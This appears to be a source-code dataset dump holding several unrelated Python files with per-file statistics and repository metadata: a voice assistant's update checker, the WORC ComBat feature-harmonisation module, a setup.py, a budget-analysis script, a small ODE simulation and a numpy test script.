def __init__(self, speaker):
self.speaker = speaker
self.c = config
self.current_version = self.c.config.get("APPLICATION", "version")
self.update_url = "https://raw.githubusercontent.com/SlapBot/va-version-check/master/version.json"
self.requests = requests
self.data = None
def check_for_update(self):
try:
self.data = self.get_update_information()
except Exception:
print("Couldn't access stephanie's version update information.")
return
try:
if str(self.current_version) != str(self.data['version']):
print("Your virtual assistant's version is %s, while the latest one is %s" % (self.current_version, self.data['version']))
if int(self.data['print_status']):
print("Kindly visit the main website of stephanie at www.github.com/slapbot/stephanie-va to update the software to it's latest version.")
if int(self.data['speak_status']):
self.speaker.speak(self.data['message'])
for message in self.data['additional_information']:
print(message)
if self.data['speak_announcement']:
self.speaker.speak(self.data['speak_announcement'])
except Exception:
print("There's some problem in recieving version update information.")
return
def get_update_information(self):
r = self.requests.get(self.update_url)
data = r.json()
return data
| 34.7
| 142
| 0.730548
| 195
| 1,388
| 5.097436
| 0.379487
| 0.080483
| 0.054326
| 0.044266
| 0.088531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146974
| 1,388
| 39
| 143
| 35.589744
| 0.839527
| 0
| 0
| 0.176471
| 0
| 0.058824
| 0.366715
| 0.041066
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.058824
| 0
| 0.264706
| 0.176471
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f591fe59a581e7f936f818cedb0f094b131b698
| 24,533
|
py
|
Python
|
WORC/featureprocessing/ComBat.py
|
MStarmans91/WORC
|
b6b8fc2ccb7d443a69b5ca20b1d6efb65b3f0fc7
|
[
"ECL-2.0",
"Apache-2.0"
] | 47
|
2018-01-28T14:08:15.000Z
|
2022-03-24T16:10:07.000Z
|
WORC/featureprocessing/ComBat.py
|
JZK00/WORC
|
14e8099835eccb35d49b52b97c0be64ecca3809c
|
[
"ECL-2.0",
"Apache-2.0"
] | 13
|
2018-08-28T13:32:57.000Z
|
2020-10-26T16:35:59.000Z
|
WORC/featureprocessing/ComBat.py
|
JZK00/WORC
|
14e8099835eccb35d49b52b97c0be64ecca3809c
|
[
"ECL-2.0",
"Apache-2.0"
] | 16
|
2017-11-13T10:53:36.000Z
|
2022-03-18T17:02:04.000Z
|
#!/usr/bin/env python
# Copyright 2020 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import scipy.io as sio
import WORC.IOparser.file_io as wio
import WORC.IOparser.config_io_combat as cio
import numpy as np
import random
import pandas as pd
from WORC.addexceptions import WORCValueError, WORCKeyError
import tempfile
from sys import platform
from WORC.featureprocessing.VarianceThreshold import selfeat_variance
from sklearn.preprocessing import StandardScaler
from neuroCombat import neuroCombat
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from WORC.featureprocessing.Imputer import Imputer
def ComBat(features_train_in, labels_train, config, features_train_out,
features_test_in=None, labels_test=None, features_test_out=None,
VarianceThreshold=True, scaler=False, logarithmic=False):
"""
Apply ComBat feature harmonization.
Based on: https://github.com/Jfortin1/ComBatHarmonization
"""
# Load the config
print('############################################################')
print('# Initializing ComBat. #')
print('############################################################\n')
config = cio.load_config(config)
excluded_features = config['ComBat']['excluded_features']
# If mod, than also load moderating labels
if config['ComBat']['mod'][0] == '[]':
label_names = config['ComBat']['batch']
else:
label_names = config['ComBat']['batch'] + config['ComBat']['mod']
# Load the features for both training and testing, match with batch and mod parameters
label_data_train, image_features_train =\
wio.load_features(features_train_in, patientinfo=labels_train,
label_type=label_names)
feature_labels = image_features_train[0][1]
image_features_train = [i[0] for i in image_features_train]
label_data_train['patient_IDs'] = list(label_data_train['patient_IDs'])
# Exclude features
if excluded_features:
print(f'\t Excluding features containing: {excluded_features}')
# Determine indices of excluded features
included_feature_indices = []
excluded_feature_indices = []
for fnum, i in enumerate(feature_labels):
if not any(e in i for e in excluded_features):
included_feature_indices.append(fnum)
else:
excluded_feature_indices.append(fnum)
# Actually exclude the features
image_features_train_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_train]
feature_labels_combat = np.asarray(feature_labels)[included_feature_indices].tolist()
image_features_train_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_train]
feature_labels_noncombat = np.asarray(feature_labels)[excluded_feature_indices].tolist()
else:
image_features_train_combat = image_features_train
feature_labels_combat = feature_labels.tolist()
image_features_train_noncombat = []
feature_labels_noncombat = []
# Detect NaNs, otherwise first feature imputation is required
if any(np.isnan(a) for a in np.asarray(image_features_train_combat).flatten()):
print('\t [WARNING] NaNs detected, applying median imputation')
imputer = Imputer(missing_values=np.nan, strategy='median')
imputer.fit(image_features_train_combat)
image_features_train_combat = imputer.transform(image_features_train_combat)
else:
imputer = None
# Apply a scaler to the features
if scaler:
print('\t Fitting scaler on dataset.')
scaler = StandardScaler().fit(image_features_train_combat)
image_features_train_combat = scaler.transform(image_features_train_combat)
# Remove features with a constant value
if VarianceThreshold:
print(f'\t Applying variance threshold on dataset.')
image_features_train_combat, feature_labels_combat, VarSel =\
selfeat_variance(image_features_train_combat, np.asarray([feature_labels_combat]))
feature_labels_combat = feature_labels_combat[0].tolist()
if features_test_in:
label_data_test, image_features_test =\
wio.load_features(features_test_in, patientinfo=labels_test,
label_type=label_names)
image_features_test = [i[0] for i in image_features_test]
label_data_test['patient_IDs'] = list(label_data_test['patient_IDs'])
if excluded_features:
image_features_test_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_test]
image_features_test_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_test]
else:
image_features_test_combat = image_features_test
image_features_test_noncombat = []
# Apply imputation if required
if imputer is not None:
image_features_test_combat = imputer.transform(image_features_test_combat)
# Apply a scaler to the features
if scaler:
image_features_test_combat = scaler.transform(image_features_test_combat)
# Remove features with a constant value
if VarianceThreshold:
image_features_test_combat = VarSel.transform(image_features_test_combat)
all_features = image_features_train_combat.tolist() + image_features_test_combat.tolist()
all_labels = list()
for i in range(label_data_train['label'].shape[0]):
all_labels.append(label_data_train['label'][i, :, 0].tolist() + label_data_test['label'][i, :, 0].tolist())
all_labels = np.asarray(all_labels)
else:
all_features = image_features_train_combat.tolist()
all_labels = label_data_train['label']
# Convert data to a single array
all_features_matrix = np.asarray(all_features)
all_labels = np.squeeze(all_labels)
# Apply logarithm if required
if logarithmic:
print('\t Taking log10 of features before applying ComBat.')
all_features_matrix = np.log10(all_features_matrix)
# Convert all_labels to dictionary
if len(all_labels.shape) == 1:
# No mod variables
all_labels = {label_data_train['label_name'][0]: all_labels}
else:
all_labels = {k: v for k, v in zip(label_data_train['label_name'], all_labels)}
# Split labels in batch and moderation labels
bat = config['ComBat']['batch']
mod = config['ComBat']['mod']
print(f'\t Using batch variable {bat}, mod variables {mod}.')
batch = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['batch']]
batch = batch[0]
if config['ComBat']['mod'][0] == '[]':
mod = None
else:
mod = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['mod']]
# Set parameters for output files
parameters = {'batch': config['ComBat']['batch'],
'mod': config['ComBat']['mod'],
'par': config['ComBat']['par']}
name = 'Image features: ComBat corrected'
panda_labels = ['parameters',
'patient',
'feature_values',
'feature_labels']
feature_labels = feature_labels_combat + feature_labels_noncombat
# Convert all inputs to arrays with right shape
all_features_matrix = np.transpose(all_features_matrix)
if mod is not None:
mod = np.transpose(np.asarray(mod))
# Patients identified with batch -1.0 should be skipped
skipname = 'Image features: ComBat skipped'
ntrain = len(image_features_train_combat)
ndel = 0
print(features_test_out)
for bnum, b in enumerate(batch):
bnum -= ndel
if b == -1.0:
if bnum < ntrain - ndel:
# Training patient
print('train')
pid = label_data_train['patient_IDs'][bnum]
out = features_train_out[bnum]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_train_noncombat[bnum])
# Delete patient for later processing
del label_data_train['patient_IDs'][bnum]
del image_features_train_noncombat[bnum]
del features_train_out[bnum]
image_features_train_combat = np.delete(image_features_train_combat, bnum, 0)
else:
# Test patient
print('test')
pid = label_data_test['patient_IDs'][bnum - ntrain]
out = features_test_out[bnum - ntrain]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_test_noncombat[bnum - ntrain])
# Delete patient for later processing
del label_data_test['patient_IDs'][bnum - ntrain]
del image_features_test_noncombat[bnum - ntrain]
del features_test_out[bnum - ntrain]
image_features_test_combat = np.delete(image_features_test_combat, bnum - ntrain, 0)
# Delete some other variables for later processing
all_features_matrix = np.delete(all_features_matrix, bnum, 1)
if mod is not None:
mod = np.delete(mod, bnum, 0)
batch = np.delete(batch, bnum, 0)
# Notify user
print(f'[WARNING] Skipping patient {pid} as batch variable is -1.0.')
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=skipname
)
print(f'\t Saving image features to: {out}.')
panda_data.to_hdf(out, 'image_features')
ndel += 1
print(features_test_out)
# Run ComBat in Matlab
if config['ComBat']['language'] == 'matlab':
print('\t Executing ComBat through Matlab')
data_harmonized = ComBatMatlab(dat=all_features_matrix,
batch=batch,
command=config['ComBat']['matlab'],
mod=mod,
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
elif config['ComBat']['language'] == 'python':
print('\t Executing ComBat through neuroComBat in Python')
data_harmonized = ComBatPython(dat=all_features_matrix,
batch=batch,
mod=mod,
eb=config['ComBat']['eb'],
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
else:
raise WORCKeyError(f"Language {config['ComBat']['language']} unknown.")
# Convert values back if logarithm was used
if logarithmic:
data_harmonized = 10 ** data_harmonized
# Convert again to train hdf5 files
feature_values_train_combat = [data_harmonized[:, i] for i in range(len(image_features_train_combat))]
for fnum, i_feat in enumerate(feature_values_train_combat):
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_train_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_train['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_train_out[fnum]}.')
panda_data.to_hdf(features_train_out[fnum], 'image_features')
# Repeat for testing if required
if features_test_in:
print(len(image_features_test_combat))
print(data_harmonized.shape[1])
feature_values_test_combat = [data_harmonized[:, i] for i in range(data_harmonized.shape[1] - len(image_features_test_combat), data_harmonized.shape[1])]
for fnum, i_feat in enumerate(feature_values_test_combat):
print(fnum)
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_test_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_test['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_test_out[fnum]}.')
panda_data.to_hdf(features_test_out[fnum], 'image_features')
def ComBatPython(dat, batch, mod=None, par=1,
eb=1, per_feature=False, plotting=False):
"""
Run the ComBat Function python script.
par = 0 is non-parametric.
"""
# convert inputs to neuroCombat format.
covars = dict()
categorical_cols = list()
covars['batch'] = batch
if mod is not None:
for i_mod in range(mod.shape[1]):
label = f'mod_{i_mod}'
covars[label] = [m for m in mod[:, i_mod]]
categorical_cols.append(label)
covars = pd.DataFrame(covars)
batch_col = 'batch'
if par == 0:
parametric = False
elif par == 1:
parametric = True
else:
raise WORCValueError(f'Par should be 0 or 1, now {par}.')
if eb == 0:
eb = False
elif eb == 1:
eb = True
else:
raise WORCValueError(f'eb should be 0 or 1, now {eb}.')
if per_feature == 0:
per_feature = False
elif per_feature == 1:
per_feature = True
else:
raise WORCValueError(f'per_feature should be 0 or 1, now {per_feature}.')
# execute ComBat
if not per_feature:
data_harmonized = neuroCombat(dat=dat, covars=covars, batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
elif per_feature:
print('\t Executing ComBat per feature.')
data_harmonized = np.zeros(dat.shape)
# Shape: (features, samples)
for i in range(dat.shape[0]):
if eb:
# Copy feature + random noise
random_feature = np.random.rand(dat[i, :].shape[0])
feat_temp = np.asarray([dat[i, :], dat[i, :] + random_feature])
else:
# Just use the single feature
feat_temp = np.asarray([dat[i, :]])
feat_temp = neuroCombat(dat=feat_temp, covars=covars,
batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
data_harmonized[i, :] = feat_temp[0, :]
if plotting:
feat1 = dat[i, :]
feat1_harm = data_harmonized[i, :]
print(len(feat1))
feat1_b1 = [f for f, b in zip(feat1, batch[0]) if b == 1.0]
feat1_b2 = [f for f, b in zip(feat1, batch[0]) if b == 2.0]
print(len(feat1_b1))
print(len(feat1_b2))
feat1_harm_b1 = [f for f, b in zip(feat1_harm, batch[0]) if b == 1.0]
feat1_harm_b2 = [f for f, b in zip(feat1_harm, batch[0]) if b == 2.0]
plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((len(feat1_b1))), feat1_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_b2, color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((len(feat1_b1))), feat1_harm_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_harm_b2, color='blue')
plt.title('After Combat')
plt.show()
else:
raise WORCValueError(f'per_feature should be False or True, now {per_feature}.')
return data_harmonized
def Synthetictest(n_patients=50, n_features=10, par=1, eb=1,
per_feature=False, difscale=False, logarithmic=False,
oddpatient=True, oddfeat=True, samefeat=True):
"""Test for ComBat with Synthetic data."""
features = np.zeros((n_features, n_patients))
batch = list()
# First batch: Gaussian with loc 0, scale 1
for i in range(0, int(n_patients/2)):
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features)]
if i == 1 and oddpatient:
feat_temp = [np.random.normal(loc=10.0, scale=1.0) for i in range(n_features)]
elif oddfeat:
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(1)
# Get directions for features
directions = list()
for i in range(n_features):
direction = random.random()
if direction > 0.5:
directions.append(1.0)
else:
directions.append(-1.0)
# First batch: Gaussian with loc 5, scale 1
for i in range(int(n_patients/2), n_patients):
feat_temp = [np.random.normal(loc=direction*5.0, scale=1.0) for i in range(n_features)]
if oddfeat:
feat_temp = [np.random.normal(loc=5.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if difscale:
feat_temp = [f + 1000 for f in feat_temp]
feat_temp = np.multiply(feat_temp, directions)
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(2)
# Create mod var
mod = [[np.random.randint(30, 100) for i in range(n_patients)]]
# Apply ComBat
batch = np.asarray([batch])
mod = np.transpose(np.asarray(mod))
if logarithmic:
minfeat = np.min(features)
features = np.log10(features + np.abs(minfeat) + 1E-100)
data_harmonized = ComBatPython(dat=features, batch=batch, mod=mod, par=par,
eb=eb, per_feature=per_feature)
if logarithmic:
data_harmonized = 10 ** data_harmonized - np.abs(minfeat)
for i in range(n_features):
f = plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((int(n_patients/2))), features[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, features[i, int(n_patients/2):], color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((int(n_patients/2))), data_harmonized[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, data_harmonized[i, int(n_patients/2):], color='blue')
plt.title('After Combat')
plt.show()
f.savefig(f'combat_par{par}_eb{eb}_perfeat{per_feature}_feat{i}.png')
# Logarithmic: not useful, as we have negative numbers, and (almost) zeros.
# so combat gives unuseful results.
# Same feature twice with eb and par: nans
def ComBatMatlab(dat, batch, command, mod=None, par=1, per_feature='true'):
"""
Run the ComBat Function Matlab script.
par = 0 is non-parametric.
"""
# Mod: default argument is empty list
if mod is None:
mod = []
# TODO: Add check whether matlab executable is found
# Save the features in a .mat MatLab Compatible format
# NOTE: Should change this_folder to a proper temporary directory
this_folder = os.path.dirname(os.path.realpath(__file__))
tempdir = tempfile.gettempdir()
tempfile_in = os.path.join(tempdir, 'combat_input.mat')
tempfile_out = os.path.join(tempdir, 'combat_output.mat')
ComBatFolder = os.path.join(os.path.dirname(this_folder),
'external',
'ComBatHarmonization',
'Matlab',
'scripts')
dict = {'output': tempfile_out,
'ComBatFolder': ComBatFolder,
'datvar': dat,
'batchvar': batch,
'modvar': mod,
'parvar': par,
'per_feature': per_feature
}
sio.savemat(tempfile_in, dict)
# Make sure there is no tempfile out from the previous run
if os.path.exists(tempfile_out):
os.remove(tempfile_out)
# Run ComBat
currentdir = os.getcwd()
if platform == "linux" or platform == "linux2":
commandseparator = ' ; '
elif platform == "win32":
commandseparator = ' & '
# BIGR Cluster: /cm/shared/apps/matlab/R2015b/bin/matlab
regcommand = ('cd "' + this_folder + '"' + commandseparator +
'"' + command + '" -nodesktop -nosplash -nojvm -r "combatmatlab(' + "'" + str(tempfile_in) + "'" + ')"' +
commandseparator +
'cd "' + currentdir + '"')
print(f'Executing ComBat in Matlab through command: {regcommand}.')
proc = subprocess.Popen(regcommand,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
proc.wait()
stdout_value, stderr_value = proc.communicate()
# BUG: Waiting does not work, just wait for output to arrive, either with
# the actual output or an error message
succes = False
while succes is False:
if os.path.exists(tempfile_out):
try:
mat_dict = sio.loadmat(tempfile_out)
try:
data_harmonized = mat_dict['data_harmonized']
succes = True
except KeyError:
try:
message = mat_dict['message']
raise WORCValueError(f'Error in Matlab ComBat execution: {message}.')
except KeyError:
pass
except (sio.matlab.miobase.MatReadError, ValueError):
pass
# Check if expected output file exists
if not os.path.exists(tempfile_out):
raise WORCValueError(f'Error in Matlab ComBat execution: command: {regcommand}, stdout: {stdout_value}, stderr: {stderr_value}')
# Read the output from ComBat
mat_dict = sio.loadmat(tempfile_out)
data_harmonized = mat_dict['data_harmonized']
data_harmonized = np.transpose(data_harmonized)
# Remove temporary files
os.remove(tempfile_out)
os.remove(tempfile_in)
return data_harmonized
| 40.684909
| 161
| 0.604329
| 2,968
| 24,533
| 4.798854
| 0.152628
| 0.055676
| 0.03665
| 0.028646
| 0.441831
| 0.35105
| 0.290739
| 0.246367
| 0.205294
| 0.186407
| 0
| 0.013316
| 0.292871
| 24,533
| 602
| 162
| 40.752492
| 0.807701
| 0.134309
| 0
| 0.252451
| 0
| 0.002451
| 0.103574
| 0.012325
| 0
| 0
| 0
| 0.001661
| 0
| 1
| 0.009804
| false
| 0.004902
| 0.041667
| 0
| 0.056373
| 0.066176
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f59e320e469d3924b3247fe49f94eea11acee62
| 727
|
py
|
Python
|
setup.py
|
mariocesar/pg-worker
|
d79c6daa8825226c754330c21150e4e416b09005
|
[
"MIT"
] | 1
|
2020-06-03T21:21:03.000Z
|
2020-06-03T21:21:03.000Z
|
setup.py
|
mariocesar/pg-worker
|
d79c6daa8825226c754330c21150e4e416b09005
|
[
"MIT"
] | null | null | null |
setup.py
|
mariocesar/pg-worker
|
d79c6daa8825226c754330c21150e4e416b09005
|
[
"MIT"
] | null | null | null |
import os
import sys
from setuptools import setup, find_packages
ROOT = os.path.realpath(os.path.join(os.path.dirname(
sys.modules['__main__'].__file__)))
sys.path.insert(0, os.path.join(ROOT, 'src'))
setup(
name='pgworker',
packages=find_packages('src'),
package_dir={'': 'src'},
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
entry_points={
'console_scripts': [
'pgworker = pgworker.runner:main'
]
}
)
| 24.233333
| 53
| 0.603851
| 77
| 727
| 5.532468
| 0.571429
| 0.056338
| 0.176056
| 0.122066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010929
| 0.244842
| 727
| 29
| 54
| 25.068966
| 0.765027
| 0
| 0
| 0
| 0
| 0
| 0.394773
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5a0eafce7a5f076591e84cd9440a10e1d4e795
| 2,040
|
py
|
Python
|
PyBank/main.py
|
gentikosumi/python-challenge
|
e6532bf1033f5272616d4f8a1cf623bbafe1a1c2
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
gentikosumi/python-challenge
|
e6532bf1033f5272616d4f8a1cf623bbafe1a1c2
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
gentikosumi/python-challenge
|
e6532bf1033f5272616d4f8a1cf623bbafe1a1c2
|
[
"ADSL"
] | null | null | null |
import os
import csv
path = '/Users/kevinkosumi12345/Genti/python-challenge/PyBank/Resources/budget_data.csv'
budget_csv=os.path.join("../Resources", "budget_data.csv")
csvfile = open(path, newline="")
reader=csv.reader(csvfile, delimiter=",")
header = next(reader)
# print(header)
# the columns we have to convert into lists
# Create first 2 empty lists according 2 columns
date = []
profloss = []
# print("Financial Anaysis")
# print("-----------------------------------------")
for row in reader:
date.append(row[0])
profloss.append(int(row[1]))
# getting the total of Profit/Losses
total_profloss='Total Profit/Losses: $ ' + str(sum(profloss))
# print(total_profloss)
# getting the number of months in entire period
monthcount = 'Total months: ' + str(len(date))
# print(monthcount)
# before finding the averadge of change in Profit/Losses, first we have to find the total change
Total_change_profloss = 0
for x in range(1, len(profloss)):
Total_change_profloss = Total_change_profloss + (profloss[x] - profloss[x-1])
# finding the averidge of change in Profit/Losses
avg_change_profloss = 'Averidge change in Profit/Loss: ' + str(round(Total_change_profloss/(len(profloss)-1),2))
# print(avg_change_profloss)
# getting the max value of data in Profit/Losses which is the Greatest Increase of Profit/Losses
maxVal = 'Greatest increase of Profit/Losses: ' + ' on ' + str(date[profloss.index(max(profloss))]) + ' $ ' + str(max(profloss))
# print(maxVal)
# the min Value of date in Profit/Losses which is the Greatest Decrease
minVal = 'Greatest decrease of Profit/Losses: ' + ' on ' + str(date[profloss.index(min(profloss))]) + ' $ ' + str(min(profloss))
# print(minVal)
DataBudget = open('analisis.csv' , 'w')
DataBudget.write('Financial Analysus\n')
DataBudget.write('------------------------\n')
DataBudget.write(monthcount + '\n')
DataBudget.write(total_profloss + '\n')
DataBudget.write(avg_change_profloss + '\n')
DataBudget.write(maxVal + '\n')
DataBudget.write(minVal + '\n')
DataBudget.close
| 30.909091
| 129
| 0.702451
| 278
| 2,040
| 5.082734
| 0.320144
| 0.076433
| 0.067941
| 0.031139
| 0.154282
| 0.096249
| 0.096249
| 0.050955
| 0
| 0
| 0
| 0.00791
| 0.132353
| 2,040
| 66
| 130
| 30.909091
| 0.790395
| 0.32549
| 0
| 0
| 0
| 0
| 0.243382
| 0.077206
| 0.068966
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.068966
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5b2c35892025ff370debbb01a9bff69a798ad0
| 1,516
|
py
|
Python
|
models/python/hypothalamus/dynamical/old/simple.py
|
ABRG-Models/MammalBot
|
0b153232b94197c7a65156c1c3451ab2b9f725ae
|
[
"MIT"
] | null | null | null |
models/python/hypothalamus/dynamical/old/simple.py
|
ABRG-Models/MammalBot
|
0b153232b94197c7a65156c1c3451ab2b9f725ae
|
[
"MIT"
] | null | null | null |
models/python/hypothalamus/dynamical/old/simple.py
|
ABRG-Models/MammalBot
|
0b153232b94197c7a65156c1c3451ab2b9f725ae
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
T = 30000
# v = 0.02906
# v = 0.617085
v = 0.99
h = 0.01
a = 0.5
b = 0.5
epsilon = 0.05
c = 0.4
eta = lambda rho: np.exp(-(rho)**2/(2*c**2))
nrho = lambda rho, v: -2.0*(rho**3 + (rho-1.0)*v/2.0 - rho)/(rho + 1.0)
nu = lambda rho: (b - eta(rho+1))/a
u = np.zeros(T)
rho = np.zeros(T)
time = np.zeros(T)
# Maps
f = lambda rho, u, v: -rho**3 - (rho + 1.0)*u/2.0 - (rho - 1.0)*v/2.0 + rho
g1 = lambda rho, u, v: epsilon*(b - a*u - eta(rho+1))
# Initial conditions
u[0] = 0.0
rho[0] = -0.0
for i in range(T-1):
rho[i+1] = rho[i] + h*f(rho[i], u[i], v)
u[i+1] = u[i] + h*g1(rho[i], u[i], v)
time[i+1] = time[i] + h
fig, ax = plt.subplots(1, 2)
# X, Y = np.meshgrid(np.arange(-0.6, 0.6, 0.1), np.arange(-0.2, 1.0, .1))
# U = f(X, Y, v)/epsilon #rho
# V = g1(X, Y, v)/epsilon #u
# q = ax[0].quiver(X, Y, U, V, units='x', pivot='tip')#, width=0.022, scale=1 / 0.40)
rhos = np.linspace(-0.99, 1, 100)
ax[0].plot( rhos, nrho(rhos, v), color = [0.8, 0.5, 0.5], linewidth = 3.0)
ax[0].plot( rhos, nu(rhos), color = [0.5, 0.5, 0.8], linewidth = 3.0)
ax[0].plot( rho[0], u[0], 'k.', linewidth = 3.0)
ax[0].plot( rho, u, 'k' )
ax[0].plot( [-1, -1], [-1.5, 1.5], 'k--')
ax[0].set_ylabel('u')
ax[0].set_xlabel(r'$\rho$')
ax[0].text(0.5, nu(0.5)+0.05, r'$u_0$')
ax[0].text(0.95, nrho(0.9, v), r'$\rho_0$')
ax[0].axis([-2, 2, -1.0, 1.5])
ax[1].plot( time, u, label = 'u')
ax[1].plot( time, rho, label = r'$\rho$' )
ax[1].legend()
ax[1].set_xlabel('time')
plt.show()
| 28.603774
| 85
| 0.529024
| 357
| 1,516
| 2.232493
| 0.22409
| 0.041405
| 0.043915
| 0.022585
| 0.136763
| 0.102886
| 0.080301
| 0
| 0
| 0
| 0
| 0.126603
| 0.176781
| 1,516
| 53
| 86
| 28.603774
| 0.512019
| 0.168865
| 0
| 0
| 0
| 0
| 0.029624
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5c0b0acb48624cb76c04ec88d096e81b40a0f1
| 176
|
py
|
Python
|
test_script.py
|
SamPurle/DE17_Flask
|
a6462b85854f7bd72c80ebcc555d50488ef17e67
|
[
"MIT"
] | null | null | null |
test_script.py
|
SamPurle/DE17_Flask
|
a6462b85854f7bd72c80ebcc555d50488ef17e67
|
[
"MIT"
] | null | null | null |
test_script.py
|
SamPurle/DE17_Flask
|
a6462b85854f7bd72c80ebcc555d50488ef17e67
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
my_array = np.zeros(10)
print(my_array)
os.system('pip freeze > requirements.txt')
my_list = [1,2,3,4,5]
for item in my_list:
print(item)
| 12.571429
| 42
| 0.693182
| 34
| 176
| 3.470588
| 0.705882
| 0.118644
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048276
| 0.176136
| 176
| 13
| 43
| 13.538462
| 0.765517
| 0
| 0
| 0
| 0
| 0
| 0.164773
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.25
| 0
| 0
| 0
| null | 0
